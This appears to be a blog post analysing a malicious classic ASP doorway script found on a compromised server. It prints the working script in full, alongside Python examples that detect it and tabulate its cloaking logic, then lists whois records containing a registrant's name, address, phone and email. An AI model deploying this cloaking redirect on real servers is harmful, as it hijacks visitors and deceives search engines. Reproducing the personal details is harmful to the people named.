Daniele Davi'

HTML Parser in Classic ASP

Today I’ll show you a script written in classic ASP that, once planted on a server through some vulnerability, hijacks traffic: it serves a copy of an unaware website’s content from a second, equally unaware server, and sends the visitors on to a third site.

It’s quite simple, so I’m not going to explain it in detail.
This malicious code was found on a server and is provided as is (I didn’t change or hide the malicious recipient), solely for educational purposes.

The educational purpose is basically the creation of an HTML or XML parser in classic ASP (here a regex-based one, run over HTML fetched with XMLHTTP and decoded through ADODB.Stream); along the way I’ll also show examples of other ASP functions.

Classic ASP

This file is called “airmaxonline2014wszat.asp”, but on the victim server there were many similar files in many folders, under different names. You can save it with whatever name you prefer.

What changes in each file?
Basically only three variables change: “fromsite”, “tourl” and “pageid”. “jumptodomain” is always the same, since the purpose of the operation is to bring traffic to the same website every time.

Note how the filename (and obviously tourl) is made to sound like fromsite, so that it blends in better in referral analysis.
A trickier aspect: to avoid serving just a blank page that redirects to the target website, the script fetches the HTML of the middle-tier web page and rewrites its links, so that what gets indexed looks like a real, existing, content-rich page. The cloned page is only shown to requests that carry no Accept-Language and no Referer header and whose User-Agent contains “bot”, that is, to search engine crawlers; every other visitor is redirected straight to jumptodomain.
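As an added example (Python, not code from the original page or from the found script), here is the kind of sweep I would run on the compromised web root to find every copy of this family. It keys on the three traits the script combines (a server-side fetch of another site’s HTML, a redirect decision based on request headers, and the hard-coded fromsite/tourl/pageid/jumptodomain literals), pulls those literals out of each hit, and groups the hits by jumptodomain to confirm they all feed the same target. The sample files and the temporary web root are constructed for the demo, and the detection patterns are assumptions drawn from this one specimen, so treat them as a starting point rather than a signature.

```python
"""Sweep a web root for copies of the ASP doorway script (Python, added example).

Not part of the original page. Keys on the three traits the found script
combines and pulls out the hard-coded target literals. Detection patterns
are assumptions drawn from this one specimen; sample files are constructed.
"""
import os
import re
import tempfile

# Trait 1: server-side fetch/decoding of someone else's HTML.
FETCH = re.compile(r"Msxml2\.(Server)?XMLHTTP|WinHttp\.WinHttpRequest|ADODB\.Stream", re.I)
# Trait 2: routing keyed on the headers a crawler tends to omit.
CLOAK = re.compile(r"HTTP_(REFERER|ACCEPT_LANGUAGE|USER_AGENT)", re.I)
# Trait 3: the redirect itself.
REDIRECT = re.compile(r"Response\.Redirect", re.I)
# Hard-coded literals: three change per copy, jumptodomain stays fixed.
# Only quoted-literal assignments match, so 'tourl = tourl&"?"...' is skipped.
ASSIGN = re.compile(r'^\s*(jumptodomain|fromsite|tourl|pageid)\s*=\s*"([^"]*)"', re.I | re.M)


def scan_asp_source(text):
    """Return the extracted literals if text has all three traits, else None."""
    if not (FETCH.search(text) and CLOAK.search(text) and REDIRECT.search(text)):
        return None
    found = {}
    for name, value in ASSIGN.findall(text):
        found.setdefault(name.lower(), value)   # first assignment wins
    return found


def scan_tree(root):
    """Walk root; map each matching ASP file (path relative to root) to its literals."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith((".asp", ".asa", ".inc")):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue                        # unreadable file: skip, keep sweeping
            result = scan_asp_source(text)
            if result is not None:
                hits[os.path.relpath(path, root)] = result
    return hits


def pivot(hits):
    """Group hits by jumptodomain: one operator behind many differently named copies."""
    by_target = {}
    for path, literals in hits.items():
        by_target.setdefault(literals.get("jumptodomain", "?"), []).append(path)
    return by_target


# Constructed: the parts of the found script the scanner keys on, nothing more.
DOORWAY_A = '''<%
On Error Resume Next
dim jumptodomain, fromsite, tourl
jumptodomain = "www.ebrandshoe.com"
fromsite = "http://www.airmaxonline2014.com/"
tourl ="http://www.foo.com/airmaxonline2014wszat.asp"
pageid = "airmaxonline2014"
tourl = tourl&"?"&pageid&"="
Set HTTPReq = Server.createobject("Msxml2.XMLHTTP")
referer=request.servervariables("HTTP_REFERER")
if referer <> "" then Response.Redirect "http://"&jumptodomain
%>'''
# Constructed second copy: different fromsite/tourl/pageid, same jumptodomain.
DOORWAY_B = DOORWAY_A.replace("airmaxonline2014", "nikefree2014")
# Constructed benign page: redirects, but never fetches another site.
BENIGN = '<% If Request("lang") = "" Then Response.Redirect "/en/" %>'


def demo():
    """Drop the constructed files into a temporary web root and sweep it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "images", "old"))
        files = {
            "airmaxonline2014wszat.asp": DOORWAY_A,
            os.path.join("images", "old", "nikefree2014qx.asp"): DOORWAY_B,
            "default.asp": BENIGN,
        }
        for rel, body in files.items():
            with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
                fh.write(body)
        hits = scan_tree(root)
        return hits, pivot(hits)


if __name__ == "__main__":
    hits, by_target = demo()
    for path, literals in sorted(hits.items()):
        print(path, "->", literals)
    print("targets:", by_target)
```

Running demo() reports the two doorway copies (one buried under images/old/) with their literals, grouped under the single jumptodomain, and leaves the benign redirect page alone. Files are read with errors="replace" so one mis-encoded file does not abort the sweep; requiring all three traits keeps ordinary redirect pages out of the results.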

Enjoy the code.

<%@LANGUAGE="VBSCRIPT" CODEPAGE="65001"%>
<%
On Error Resume Next
dim jumptodomain, imagefolder, fromsite, tourl
jumptodomain = "www.ebrandshoe.com"
fromsite = "http://www.airmaxonline2014.com/" 
tourl ="http://www.foo.com/airmaxonline2014wszat.asp"
pageid = "airmaxonline2014" 
imagefolder = "images/"
tourl = tourl&"?"&pageid&"="

Function GetLocationURL() 
	Dim Url 
	Dim ServerPort,ServerName,ScriptName,QueryString 
	ServerName = Request.ServerVariables("SERVER_NAME") 
	ServerPort = Request.ServerVariables("SERVER_PORT") 
	ScriptName = Request.ServerVariables("SCRIPT_NAME") 
	QueryString = Request.ServerVariables("QUERY_STRING") 
	Url="http://"&ServerName 
	If ServerPort <> "80" Then Url = Url & ":" & ServerPort 
	Url=Url&ScriptName 
	If QueryString <>"" Then Url=Url&"?"& QueryString 
	GetLocationURL=Server.URLEncode(Url)
End Function
Function GetCode(str,regstr)
	Dim Reg,serStr,Cols
	Set Reg= new RegExp
	Reg.IgnoreCase = True
	Reg.MultiLine = True
	Reg.Pattern =regstr
	If Reg.test(str) Then
	   Set Cols = Reg.Execute(str)
	   GetCode=Cols(0).SubMatches(0)
	Else 
	   GetCode=""
	End If
	Set Cols = Nothing
	Set Reg = Nothing
End Function
%>
<%
on error resume next
Function getHTTPPage(URL)
	Set HTTPReq = Server.createobject("Msxml2.XMLHTTP")
	HTTPReq.Open "GET", URL, False
	HTTPReq.send
	If HTTPReq.readyState <> 4 Then Exit Function
	getHTTPPage = Bytes2bStr(HTTPReq.responseBody)
	Set HTTPReq = Nothing
End Function
Function Bytes2bStr(vin)
	Dim BytesStream,StringReturn
	Set BytesStream = Server.CreateObject("ADODB.Stream")
	BytesStream.Type = 2
	BytesStream.Open
	BytesStream.WriteText vin
	BytesStream.Position = 0
	BytesStream.Charset = "UTF-8"
	BytesStream.Position = 2
	StringReturn = BytesStream.ReadText
	BytesStream.close
	Set BytesStream = Nothing
	Bytes2bStr = StringReturn
End Function
if request(pageid)<>"" then
htmls = getHTTPPage(fromsite&request(pageid))
htmls =  replace(htmls,""&chr(34)&fromsite,""&chr(34)&"/")
htmls =  replace(htmls,""&chr(34)&"/"&imagefolder,""&chr(34)&fromsite&imagefolder)
htmls =  replace(htmls,""&chr(34)&imagefolder,""&chr(34)&fromsite&imagefolder)
htmls =  replace(htmls,""&chr(34)&"/includes/",""&chr(34)&fromsite&"includes/") 
htmls =  replace(htmls,""&chr(34)&"includes/",""&chr(34)&fromsite&"includes/") 
htmls =  replace(htmls,""&chr(34)&"/media/",""&chr(34)&fromsite&"media/") 
htmls =  replace(htmls,""&chr(34)&"media/",""&chr(34)&fromsite&"media/")
htmls =  replace(htmls,""&chr(34)&"/skin/",""&chr(34)&fromsite&"skin/") 
htmls =  replace(htmls,""&chr(34)&"js/",""&chr(34)&fromsite&"skin/")
htmls =  replace(htmls,""&chr(34)&"/js/",""&chr(34)&fromsite&"js/") 
htmls =  replace(htmls,""&chr(34)&"skin/",""&chr(34)&fromsite&"js/") 
htmls =  replace(htmls,"href="&chr(34),"href="&chr(34)&"/") 
htmls =  replace(htmls,"href="&chr(34)&"//","href="&chr(34)&"/") 
htmls =  replace(htmls,"href="&chr(34)&"/http","href="&chr(34)&"http") 
htmls =  replace(htmls,"href="&chr(34)&"/","href="&chr(34)&tourl) 
else
htmls = getHTTPPage(fromsite)
htmls =  replace(htmls,""&chr(34)&fromsite,""&chr(34)&"/")
htmls =  replace(htmls,""&chr(34)&"/"&imagefolder,""&chr(34)&fromsite&imagefolder)
htmls =  replace(htmls,""&chr(34)&imagefolder,""&chr(34)&fromsite&imagefolder)
htmls =  replace(htmls,""&chr(34)&"/includes/",""&chr(34)&fromsite&"includes/") 
htmls =  replace(htmls,""&chr(34)&"includes/",""&chr(34)&fromsite&"includes/")
htmls =  replace(htmls,""&chr(34)&"/media/",""&chr(34)&fromsite&"media/") 
htmls =  replace(htmls,""&chr(34)&"media/",""&chr(34)&fromsite&"media/") 
htmls =  replace(htmls,""&chr(34)&"/skin/",""&chr(34)&fromsite&"skin/") 
htmls =  replace(htmls,""&chr(34)&"js/",""&chr(34)&fromsite&"skin/")
htmls =  replace(htmls,""&chr(34)&"/js/",""&chr(34)&fromsite&"js/") 
htmls =  replace(htmls,""&chr(34)&"skin/",""&chr(34)&fromsite&"js/") 
htmls =  replace(htmls,"href="&chr(34),"href="&chr(34)&"/") 
htmls =  replace(htmls,"href="&chr(34)&"//","href="&chr(34)&"/") 
htmls =  replace(htmls,"href="&chr(34)&"/http","href="&chr(34)&"http") 
htmls =  replace(htmls,"href="&chr(34)&"/","href="&chr(34)&tourl) 
end if

dim pagetitle
pagetitle = GetCode(htmls,"(.*?)<\/title>")
pagetitle = Server.URLEncode(pagetitle)
dim agent,language,referer
agent=request.servervariables("http_user_agent")
language=request.servervariables("HTTP_ACCEPT_LANGUAGE")
referer=request.servervariables("HTTP_REFERER")
if language = "" and referer = "" then
	if InStr(agent, "bot")<=0 then
		Response.Redirect "http://"&jumptodomain&"/?from="&GetLocationURL()&"&q="&pagetitle
		Response.End
	end if
else
	Response.Redirect "http://"&jumptodomain&"/?from="&GetLocationURL()&"&q="&pagetitle
	Response.End
end if
response.write htmls
%>
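The branch at the end of the script decides who sees what. As an added example (Python, not part of the original page or of the found script), I re-express that decision and the redirect it builds so the routing can be tabulated against request headers; the request profiles, the sample HTML and the victim URL below are constructed for the demo. The replica keeps two details of the VBScript as found: InStr does a case-sensitive compare, so only a lowercase “bot” counts, and the title pattern has no opening <title> anchor, so the q= parameter carries everything on that line before </title>.

```python
"""Replica of the doorway script's cloaking decision (Python, added example).

Not part of the original page: the final VBScript branch of the found script
is re-expressed so its routing can be tabulated against request headers.
Request profiles, sample HTML and the victim URL below are constructed.
"""
import re
from urllib.parse import quote_plus, urlencode

JUMPTODOMAIN = "www.ebrandshoe.com"   # fixed target hard-coded in the script


def page_title_field(html):
    """What the script's GetCode(htmls, "(.*?)<\\/title>") captures: first
    match, case-insensitive, '.' not crossing newlines. With no opening
    <title> anchor the capture starts at the beginning of that line, so the
    tag itself and any indentation travel along."""
    m = re.search(r"(.*?)</title>", html, re.I)
    return m.group(1) if m else ""


def decide(user_agent, accept_language, referer):
    """Mirror of the script's branch on HTTP_ACCEPT_LANGUAGE, HTTP_REFERER and
    HTTP_USER_AGENT. VBScript InStr(agent, "bot") is a case-sensitive binary
    compare, so only a lowercase 'bot' keeps a request on the cloned page."""
    if accept_language == "" and referer == "":
        if "bot" not in user_agent:
            return "redirect"          # headless client without 'bot' in UA
        return "serve copy"            # crawler-looking request: cloned HTML
    return "redirect"                  # any Referer or Accept-Language present


def redirect_target(location_url, html):
    """Location the visitor is sent to. Both values go through the same
    URL-encoding Server.URLEncode applies (spaces become '+')."""
    qs = urlencode({"from": location_url, "q": page_title_field(html)},
                   quote_via=quote_plus)
    return f"http://{JUMPTODOMAIN}/?{qs}"


# Constructed request profiles: (label, User-Agent, Accept-Language, Referer).
PROFILES = [
    ("browser, direct", "Mozilla/5.0 (Windows NT 6.1) Chrome/36", "en-US,en;q=0.8", ""),
    ("browser, from search", "Mozilla/5.0 (Windows NT 6.1) Chrome/36", "en-US", "http://www.google.com/"),
    ("Googlebot", "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)", "", ""),
    ("bingbot", "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)", "", ""),
    ("Baiduspider", "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)", "", ""),
    ("curl", "curl/7.30.0", "", ""),
]


def routing_table():
    """Map each profile label to the script's decision for it."""
    return {label: decide(ua, lang, ref) for label, ua, lang, ref in PROFILES}


if __name__ == "__main__":
    for label, outcome in routing_table().items():
        print(f"{label:22} -> {outcome}")
    sample = "<html>\n<head>\n  <title>Air Max Online 2014</title>\n</head>"
    print(redirect_target("http://victim.example/airmaxonline2014wszat.asp", sample))
```

The table shows the practical consequence for an investigator: a browser or a plain curl is redirected to jumptodomain and never sees the cloned content, while Googlebot and bingbot get the copy. To reproduce what the search engine indexed, send a crawler-like request yourself (no Accept-Language, no Referer, lowercase “bot” in the User-Agent, e.g. curl -A Googlebot against the doorway URL). A crawler whose User-Agent lacks the literal “bot”, Baiduspider for one, is treated like a visitor. The from= parameter in the redirect carries the doorway’s own URL, so the target site’s logs identify every compromised host feeding it.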

Of course it is natural to be curious about who tried to benefit from these pages, and anyone can perform a whois request on the two domains to learn more about them. To save you some time, I’m copying here what whois returned to me.
The scammer:

Registrant Org: MING AI (associated with ~22 other domains)
Registrar: GODADDY.COM, LLC
Registrar Status: clientDeleteProhibited, clientRenewProhibited, clientTransferProhibited, clientUpdateProhibited
Dates: Created on 2014-07-22 - Expires on 2015-07-22 - Updated on 2014-08-18
Name Server(s): F1G1NS1.DNSPOD.NET (has 1,672,713 domains), F1G1NS2.DNSPOD.NET (has 1,672,713 domains)
IP Address: 109.235.50.202 (12 other sites hosted on this server)
IP Location: Netherlands - Utrecht - Houten - Xeneurope Vps Services
ASN: Netherlands AS47869 NETROUTING-AS Netrouting,NL (registered Sep 09, 2008)
Domain Status: Registered And Active Website
Whois History: 11 records have been archived since 2011-05-14
IP History: 5 changes on 5 unique IP addresses over 3 years
Registrar History: 1 registrar with 1 drop
Hosting History: 4 changes on 3 unique name servers over 3 years
Whois Server: whois.godaddy.com

Website
Website Title: EBrandShoe - Cheap NIKE - JUST DO IT, Enjoy buying cheap nike air max, nike free,nike air max ireland store are discount price and 100% quality goods!
Server Type: Apache/2.2.15
Response Code: 200
SEO Score: 83%
Terms: 3073 (Unique: 348, Linked: 2788)
Images: 48 (Alt tags missing: 15)
Links: 771 (Internal: 771, Outbound: 0)

Whois Record (last updated on 2014-08-28)
Domain Name: EBRANDSHOE.COM
Registrar URL: http://www.godaddy.com
Registrant Name: MING AI
Registrant Organization: 
Name Server: F1G1NS1.DNSPOD.NET
Name Server: F1G1NS2.DNSPOD.NET
DNSSEC: unsigned

The (unaware?) supporter:

airmaxonline2014.com | Domain Information
Updated: 2014-06-12
Air Max Online 2014 - Airmaxonline2014 - airmaxonline2014.com
Technical Data
Page Rank: N/A
IP: 94.242.255.127
IP-based Geolocation of Airmaxonline2014.com: Luxembourg
IP-based Coordinates: latitude 49.75 | longitude 6.17
Status: Online (New)

Domain Name: AIRMAXONLINE2014.COM
Registry Domain ID: 1855988301_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.enom.com
Registrar URL: www.enom.com
Updated Date: 2014-04-24 03:37:24Z
Creation Date: 2014-04-24 10:37:00Z
Registrar Registration Expiration Date: 2015-04-24 10:37:00Z
Registrar: ENOM, INC.
Registrar IANA ID: 48
Registrar Abuse Contact Email: abuse@enom.com
Registrar Abuse Contact Phone: +1.4252744500
Domain Status: clientTransferProhibited
Registry Registrant ID: 
Registrant Name: TIAN JING
Registrant Organization: 
Registrant Street: NO.516, XIBALIWA, SHIZHONGQU
Registrant City: JINAN
Registrant State/Province: SHANDONG
Registrant Postal Code: 250002
Registrant Country: CN
Registrant Phone: +86.5132973673
Registrant Phone Ext: 
Registrant Fax: 
Registrant Fax Ext:
Registrant Email: NHURIE@SINA.COM
Registry Admin ID: 
Admin Name: TIAN JING
Admin Organization: 
Admin Street: NO.516, XIBALIWA, SHIZHONGQU
Admin City: JINAN
Admin State/Province: SHANDONG
Admin Postal Code: 250002
Admin Country: CN
Admin Phone: +86.5132973673
Admin Phone Ext: 
Admin Fax: 
Admin Fax Ext:
Admin Email: NHURIE@SINA.COM
Registry Tech ID: 
Tech Name: TIAN JING
Tech Organization: 
Tech Street: NO.516, XIBALIWA, SHIZHONGQU
Tech City: JINAN
Tech State/Province: SHANDONG
Tech Postal Code: 250002
Tech Country: CN
Tech Phone: +86.5132973673
Tech Phone Ext: 
Tech Fax: 
Tech Fax Ext: 
Tech Email: NHURIE@SINA.COM
Name Server: DNS1.NAME-SERVICES.COM
Name Server: DNS2.NAME-SERVICES.COM
Name Server: DNS3.NAME-SERVICES.COM
Name Server: DNS4.NAME-SERVICES.COM
Name Server: DNS5.NAME-SERVICES.COM
DNSSEC: unSigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
Last update of WHOIS database: 2014-04-24 03:37:24Z